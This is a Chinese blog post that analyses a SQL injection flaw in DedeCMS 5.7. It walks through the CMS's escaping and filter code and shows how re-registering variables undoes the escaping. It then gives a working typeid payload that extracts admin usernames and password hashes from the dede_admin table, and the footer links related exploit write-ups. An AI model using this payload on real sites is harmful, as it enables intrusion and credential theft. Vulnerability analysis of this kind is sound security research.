dedecms+5.7+is+php,Dedecms v5.7 最新注入分析

最新推荐文章于 2022-09-07 14:10:32 发布
最新推荐文章于 2022-09-07 14:10:32 发布
阅读量219 收藏
点赞数
文章标签: dedecms+5.7+is+php

完整的输入语句,第二个参数 typeid可控。

1

INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('108','2','游客','paxmac','127.0.0.1','1','1351774092','0','0','0','feedback','0','nsfocus&&paxmac team');

想要利用注入,就要先了解下dedecms的防御机制。

首先他对一切request进来的参数都会进行转义,具体看代码

L3Byb3h5L2h0dHAvaHVha2FpLnBheG1hYy5vcmcvd3AtY29udGVudC91cGxvYWRzLzIuanBnLnBuZw==.jpg

common.inc.php文件 会把所有的request进行处理。

01

function _RunMagicQuotes(&$svar)

02

{

03

if(!get_magic_quotes_gpc())

04

{

05

if(is_array($svar) )

06

{

07

foreach($svar as $_k =>$_v)$svar[$_k] = _RunMagicQuotes($_v);

08

}

09

else

10

{

11

if(strlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )

12

{

13

exit('Request var not allow!');

14

}

15

$svar =addslashes($svar);

16

}

17

}

18

return $svar;

19

}

20

…..

21

foreach(Array('_GET','_POST','_COOKIE')as $_request)

22

{

23

foreach($$_request as $_k =>$_v)

24

{

25

if($_k =='nvarname') ${$_k} =$_v;

26

else ${$_k} = _RunMagicQuotes($_v);

27

}

28

}

29

….

从上面代码可以看到他对外来的提交进行了转义处理,但是在filter.ini.php文件中

01

function _FilterAll($fk, &$svar)

02

{

03

global $cfg_notallowstr,$cfg_replacestr;

04

if(is_array($svar) )

05

{

06

foreach($svar as $_k =>$_v)

07

{

08

$svar[$_k] = _FilterAll($fk,$_v);

09

}

10

}

11

else

12

{

13

if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i",$svar))

14

{

15

ShowMsg(" $fk has not allow words!",'-1');

16

exit();

17

}

18

if($cfg_replacestr!='')

19

{

20

$svar = preg_replace('/'.$cfg_replacestr.'/i',"***",$svar);

21

}

22

}

23

return $svar;

24

}

25

26

/* 对_GET,_POST,_COOKIE进行过滤 */

27

foreach(Array('_GET','_POST','_COOKIE')as $_request)

28

{

29

foreach($$_request as $_k =>$_v)

30

{

31

${$_k} = _FilterAll($_k,$_v);

32

}

33

}

上面是处理敏感词的代码,但是又对变量进行了注册,导致了变量二次覆盖漏洞。其实这漏洞很早前就存在,之前的是因为对提交的变量只检查一维数组的key,可以被绕过从而创建不允许的系统配置变量,dedecms历来的修改都让人摸不着头脑,修补的都是表面的东西,实质导致漏洞问题的原因不做修改。从这次的补丁看来,他就只加了一句判断$typeid是否为数字,对于80sec的防注入代码2次被绕过还继续无视。

所以在GPC=OFF的时候,被转义的变量又会被重新覆盖而变成正常代码。

Eg: typeid=2\’ 经过覆盖 typeid=2’

研究过上次dedecms SQL注入的问题的同学肯定了解他的防注入机制。这里做下简单的分析。他对于\到\之间的内容作为可信任,不对其进行检查。所以我们只要把想利用的代码放在’ ‘内就能躲过检查。利用Mysql的一个语法,他的值@`’`为空,下面来构造漏洞exp:

typeid=123′,@`’`,0×11111,1111,1,1351739660, 0,0,0,0,0,(SELECT concat(uname,0x5f,pwd,0x5f) FROM dede_admin)),(108,’1111

我用tamper data提交此参数,

8fdf865d9e47306ec9cb9bab49484c5b.png

其实这里也利用了一个小bug

5a15bf54464f2ce901cd0e4502800bee.png

可以看到他的表结构,只有msg可以为null,但是利用代码中在username中用了null,这是非法的语句,单独插入是不会成功的,但是后面一句语句是成立的,insert (a,b) values (1,1),(2,2) (1,1,)非法 (2,2)符合条件的时候会成功同时插入2条语句。由于显示字符数量的问题,所以选择了msg字段作为输出。

b656617b5b20ed3addfc3d0fadc2e45a.png

最年轻的校长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DedeCms二次注入复现
sun1296825481的博客
01-07 2066
DedeCms二次注入复现 配置 DedeCms 5.6 php 5.2.17 phpstudy 8.1.1.2 Firefox Hackbar V2 御剑 菜刀 一、环境搭建 1、下载DedeCms5.6 链接地址:https://download.csdn.net/download/sun1296825481/14041738 2、解压至phpstudy的www目录下 3、安装环境 1)创建数据库 2)访问http://localhost/dedecms/uploads/install/ 3)按
dedecms注入
____
07-04 523
dedecms这一套程序太火爆了,但是他的sql都是直接拼接的,经常被注入。 GET //plus/erraddsave.php?dopost=saveedit&a=b&arrs 1[]=99&c=d&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=1
dedecms注入漏洞 search.php,Dedecms最新注入漏洞分析及修复方法
weixin_35733151的博客
03-18 531
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。一. 漏洞跟踪发布时间:2013年6月7日漏洞描述:DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+...
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5418
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
PHP7 sql注入,dedecms_5.7 download.php SQL注入
weixin_39897392的博客
03-21 347
最近在看Web渗透与漏洞挖掘,这本书的编写目的感觉非常的不错,把渗透和代码审计结合在一起,但是代码审计部分感觉思路个人认为并不是很清晰,在学习dedecms v5.7 SQL注入的时候就只看懂了漏洞,思路依然感觉迷茫,在这里我重新梳理一下这个漏洞的挖掘思路。这个漏洞主要包括两方面,一是SQL注入本身,二是全局变量$GLOBALS可以被用户操控。拿到cms我们还是先浏览大致的结构,然后我们重点关注/...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
【标题】"基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 指的是一款专门用于品牌设计的网站模板,该模板是建立在PHP编程语言基础上,利用DEDECMS(织梦内容管理系统)的核心功能构建的。DEDECMS是一款流行的...
php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
11-19
【标题】"php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 提供的是一个基于PHP语言开发的网站模板,适用于品牌设计展示。DEDECMS(织梦内容管理系统)是一个广泛使用的开源CMS系统,它允许用户通过简单的操作构建和...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心v5.7源码.zip
10-10
【标题】"基于PHP的东莞蒂凡品牌设计模板DEDECMS核心v5.7源码.zip" 提供的是一款基于PHP编程语言的网站模板,它主要用于品牌设计领域,利用了DEDECMS(织梦内容管理系统)的核心框架。DEDECMS是一款广泛应用于中小型...
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
DEDECMS5.7星星评分插件
04-30
DEDECMS5.7星星评分插件是一款专为织梦内容管理系统(DEDECMS v5.7)设计的扩展组件,旨在为网站内容提供一种直观、用户友好的评分功能。这款插件允许访客对文章、产品或其他内容进行打分,以五角星的形式展示,从而...
dedesql.class.php注入,DedeCMS SQL注入
weixin_39884373的博客
04-05 364
发布时间:2016-08-21公开时间:N/A漏洞类型:SQL注入危害等级:高漏洞编号:xianzhi-2016-08-39374560测试版本:N/A漏洞详情plus/carbuyaction.php$Items=$cart->getItems();if(empty($Items)){ShowMsg("您的购物车中没有商品!","-1");exit();}………...
DedeCMS-5.8.1 SSTI模板注入导致RCE
NAUYX转
03-12 690
影响范围 DedeCMS v5.8.1 beta 1 漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现 漏洞复现 环境搭建 这里使用phpstudy来搭建环境 网站前台:http://192.168.59.1/index.php?upcache=1 网站后台:
dedecms最新注入分析(可过gpc)
收集盒 Book box
01-30 512
Author:唐门三少 代码分析省略。 PoC利用 在开启gpc的情况下 1 http://target/plus/search.php?typeArr[1%20or%20@`'`%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substring((Se
dedecms织梦SESSION变量覆盖导致SQL注入common.inc.php
09-07 276
漏洞描述:dedecms的/plus/advancedsearch.php中,直接从SESSION[SESSION[sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_start = 1即开始了自动SESSION会话,云盾团队在dedemcs的变量注册入口进行了通用统一防御,禁止SESSION变量的传入。dedecms SESSION变量覆盖导致SQL注入common.inc.php的解决方法。补丁文件:/include/common.inc.php
二次注入 php,dedecms20140606 二次注入+存储型xss
weixin_32862641的博客
03-13 280
红色目录有exp,注入比较鸡肋目录dede/soft_edit.php, 存储型XSS漏洞 2include /memberlogin.class.php 会员笔名二次注入 4dede/soft_edit.php, 存储型XSS漏洞[php]/*** 软件编辑** @version $Id: soft_edit.php 1 16:09 2010年7月20日...
dedecms最新注入漏洞
cnbird's blog
08-28 1535
作者:张恒# Gh0u1:我没测试,先保留一下,晚上再说。dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究.利用此漏洞进行违法活动者,后果自负.假设域名是:www.abc.com攻击步骤如下:1. 访问网址:http://www.abc.com/plus/digg_frame.php?action=good&id=1024%
dedecms 漏洞_代码审计之二次漏洞审计
weixin_39950010的博客
11-29 427
什么是二次漏洞需要先构造好利用代码写入网站保存,在第二次或多次请求后调用攻击代码触发或者修改配置触发的漏洞叫做二次漏洞。二次漏洞有点像存储型XSS的味道,就算payload插进去了,能不能利用还得看页面输出有没有过滤。举一个简单的SQL注入例子攻击者A在网站评论的地方发表了带有注入语句的评论,这时候注入语句已经被完整地保存到数据库中但是评论引用功能存在一个SQL注入漏洞,于是攻击者在评论处引用刚提...
php5217 0day,知道创宇:最新DEDECMS存SQL注入0day漏洞
weixin_35715440的博客
04-07 149
站长之家(chinaz.com)4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。知道创宇给出三种临时解决方案:方案一、临时补丁,需要四步1. 确保您的magic_quotes_gpc = On详细开启...
dedecms-v5.7.95-utf8.zip
最新发布
12-19
dedecms-v5.7.95-utf8.zip是一个开源的内容管理系统(CMS)软件压缩包。这个压缩包包含了dedecms v5.7.95版本的所有程序文件和相关资源,采用了UTF-8编码格式。 这个CMS软件是基于PHP+MySQL开发的,并且支持插件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值